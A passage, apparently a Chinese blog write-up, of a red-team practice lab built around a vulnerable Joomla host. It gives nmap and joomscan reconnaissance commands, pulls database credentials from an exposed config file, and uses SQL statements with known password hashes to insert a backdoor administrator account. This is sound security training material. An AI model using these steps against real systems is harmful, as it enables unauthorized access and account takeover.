ATT&CK红队评估(红日靶场三)

靶场搭建

靶场下载地址:漏洞详情

本次测试为黑盒测试,所以所有主机都为挂起状态,且账号都默认已经登录

已知出网主机为centos主机

将centos出网网卡和kali攻击机网卡都设置为NAT模式

其它网卡都默认vmnet2模式

如果没有vmnet2虚拟网络,应该在虚拟网络编辑器建立一个虚拟网络vmnet2,仅主机模式,子网地址为192.168.93.0

开启centos,第一次运行,需重新获取桥接模式网卡ip

service network restart

查看ip,发现两个网段

192.168.48.0/24(出网ip)和192.168.93.0/24(内网ip)

在kali上ping一下出网主机,看能否连通

开启所有主机,靶场搭建完毕

渗透测试

因为是黑盒测试,所以我们现在并不知道出网主机的ip

使用nmap扫描整个网段,探测存活主机

nmap -sP -T4 192.168.48.0/24

发现136和134两台主机(1,2,254是网关和广播地址)

136是KALI攻击机,所以靶机地址为192.168.48.134

使用nmap扫描查看端口开放情况

nmap -sS -p 1-65535 -A 192.168.48.134

开放了22端口,ssh服务,可能存在密码爆破

开放了80端口,存在http网站服务

开放了3306,存在MYSQL服务,可能存在弱口令

访问网站

知道网站CMS是Joomla,直接用kali自带工具joomscan进行扫描

joomscan --url http://192.168.48.134/

没有发现漏洞,发现后台

http://192.168.48.134/administrator/index.php

访问后台

测试了一下存不存在默认账号密码弱口令,发现不存在

还扫描出一个敏感配置文件

在配置文件中找到了数据库账号密码

使用Nivicat工具成功连接数据库

前面joomscan已经扫描出joomla版本为3.9.12

搜索引擎搜索此版本添加密码的方法

搜索到Joomla使用SQL代码添加密码 Joomla 2.5 Joomla 3.x Joomla 4.x

(这里需要注意表名和组名,这里表名为am2zu_users,组名为am2zu_user_usergroup_map)

INSERT INTO am2zu_users (name, username, password, params, registerDate, lastvisitDate, lastResetTime) VALUES ('Administrator2', 'admin123', '433903e0a9d6a712e00251e44d29bf87:UJ0b9J5fufL3FKfCc0TLsYJBh2PFULvT', '', NOW(), NOW(), NOW()); INSERT INTO am2zu_user_usergroup_map (user_id,group_id) VALUES (LAST_INSERT_ID(),'8'); - admin = 433903e0a9d6a712e00251e44d29bf87:UJ0b9J5fufL3FKfCc0TLsYJBh2PFULvT - secret = d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199 - OU812 = 5e3128b27a2c1f8eb53689f511c4ca9e:J584KAEv9d8VKwRGhb8ve7GdKoG7isMm

执行sql语句添加账号密码admin123/admin

  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值